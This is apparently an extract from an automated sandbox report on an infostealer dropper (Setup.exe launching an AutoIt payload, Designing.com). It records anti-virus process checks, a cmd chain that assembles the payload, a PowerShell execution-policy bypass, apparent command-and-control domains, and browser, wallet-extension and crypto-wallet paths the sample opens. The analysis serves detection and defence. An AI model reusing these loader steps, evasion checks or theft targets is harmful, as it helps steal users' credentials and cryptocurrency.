                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E1A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00E1A1E2
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E0E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_00E0E472
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E1A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_00E1A570
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E166DC FindFirstFileW,FindNextFileW,FindClose,12_2_00E166DC
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DDC622 FindFirstFileExW,12_2_00DDC622
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E173D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_00E173D4
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E17333 FindFirstFileW,FindClose,12_2_00E17333
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E0D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00E0D921
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DA5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00DA5FC8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\124531\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\124531Jump to behavior
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512390549.00000000042C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2558815498.000000000427D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMCIZM
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512390549.00000000042C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E1F4FF BlockInput,12_2_00E1F4FF
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DA338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00DA338B
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC5058 mov eax, dword ptr fs:[00000030h]12_2_00DC5058
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E020AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,12_2_00E020AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DD2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00DD2992
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00DC0BAF
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC0D45 SetUnhandledExceptionFilter,12_2_00DC0D45
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00DC0F91

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: quantitypitt.click
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E01B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00E01B4D
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DA338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00DA338B
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E0BBED SendInput,keybd_event,12_2_00E0BBED
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E0ECD0 mouse_event,12_2_00E0ECD0
                Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 124531Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E LtJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Heater" Lance Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Needs + ..\Conclusion + ..\Rendered + ..\French + ..\Selected + ..\Hormone + ..\Rough zJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\124531\Designing.com Designing.com zJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="bxbnwzevlkhtdosp9hk3kfhiumjhb_d.556jpjn0vjs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="bxbnwzevlkhtdosp9hk3kfhiumjhb_d.556jpjn0vjs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E014AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_00E014AE
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E01FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_00E01FB0
                Source: Designing.com, 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp, Designing.com, 0000000C.00000003.2438306481.000000000528E000.00000004.00000800.00020000.00000000.sdmp, Sun.9.dr, Designing.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Designing.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC0A08 cpuid 12_2_00DC0A08
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DFE5F4 GetLocalTime,12_2_00DFE5F4
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DFE652 GetUserNameW,12_2_00DFE652
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DDBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_00DDBCD2
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Designing.com PID: 6380, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *exodus*
                Source: Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Designing.com, 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: :"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"WB
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
